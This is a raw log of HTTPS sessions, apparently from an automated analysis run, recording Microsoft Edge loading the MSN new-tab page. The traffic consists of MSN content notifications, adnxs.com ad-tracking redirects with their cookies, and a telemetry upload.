                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://ib.adnxs.com/bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D
                                                                                                                                                                  AN-X-Request-Uuid: 4703e0a4-3925-4d87-8f35-8be962422e05
                                                                                                                                                                  Set-Cookie: XANDR_PANID=1LE7sQSSiFwa9i-AI4_GI-MWOhBI1K_X35QIVGl5c5oAXMfRkwtX4LXGoAcmPTcD3-NbBK1SRdo-noFxRKxiPr_tURzvSiG1RgM2jJQZrjM.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=404687649564003660; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  47192.168.11.2057559204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC1023OUTGET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:37 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 1DE959D34A3D4FABB500F6A79E7AAA96 Ref B: CHI30EDGE0111 Ref C: 2025-01-11T06:54:36Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  48192.168.11.206527068.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC718OUTGET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:37 UTC1582INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D
                                                                                                                                                                  AN-X-Request-Uuid: a4d7d641-d2f5-46e3-949e-860a11778bf7
                                                                                                                                                                  Set-Cookie: XANDR_PANID=pczX6aoAgUnQDKubIDckU-ZbjAdvaoVsClMgIVrrar8S9-aQGGx3o-x67vcDtPjuGDQGmthz59OULAcLfb7fMvS0keuisGHvhS6uMsD7MLg.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:37 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=6844831910942572980; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  49192.168.11.206325568.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC678OUTGET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:37 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  AN-X-Request-Uuid: fc917fc2-100c-4bad-8782-89950e83c2fc
                                                                                                                                                                  Set-Cookie: anj=dTM7k!M4.FE:2jUF']wIg2E?hl7YT4!]tbPl1N!y*v_#NUa)ic_)mKcXt7O%Q9!(1W%V`LZ4JB[VFvM%SjN5@TMaOdjO)#m/X%W#.wL4W1Qw2+/<F+>; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com
                                                                                                                                                                  2025-01-11 06:54:37 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,@L;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  50192.168.11.2061072204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC1025OUTGET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:37 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: B7EEC5C3AEA14B10A3009B7E3D233B66 Ref B: CHI30EDGE0215 Ref C: 2025-01-11T06:54:37Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  51192.168.11.2064886204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:37 UTC1015OUTGET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:37 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 20D5634DBB304243A4A37B28C9D5CB05 Ref B: CHI30EDGE0408 Ref C: 2025-01-11T06:54:37Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  52192.168.11.2050028204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:37 UTC1029OUTGET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:37 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: C0610611355F4135B9F10E9D3536161B Ref B: CHI30EDGE0408 Ref C: 2025-01-11T06:54:37Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  53192.168.11.205999768.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:37 UTC760OUTGET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:37 UTC1249INHTTP/1.1 302 Found
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://ib.adnxs.com/setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=
                                                                                                                                                                  AN-X-Request-Uuid: b77184ea-abb0-41c0-ad7f-5ce97d5dadcf
                                                                                                                                                                  Set-Cookie: anj=dTM7k!M4/8CxrEQF']wIg2E?hl7YT4!]tbP6j2F-XstGt!@Dtk$wmsg; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:37 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  54192.168.11.204942068.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:38 UTC652OUTGET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:38 UTC1428INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:38 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://ib.adnxs.com/bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D
                                                                                                                                                                  AN-X-Request-Uuid: b376b221-4d1b-40b9-912c-68d68f31b339
                                                                                                                                                                  Set-Cookie: XANDR_PANID=AP571r7UgJcsKek5ht2MO-HnI0BoJBcRPOYye7j-SwOEmqvZsQn2D-R3D6f98erGNTfCNcEdM2IpZQUcgIVV99qfBnwp5Vnzs-gtlVtY4mo.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:38 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:38 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=8641538635561712758; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:38 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  55192.168.11.205055913.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:38 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578473713&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 16171
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
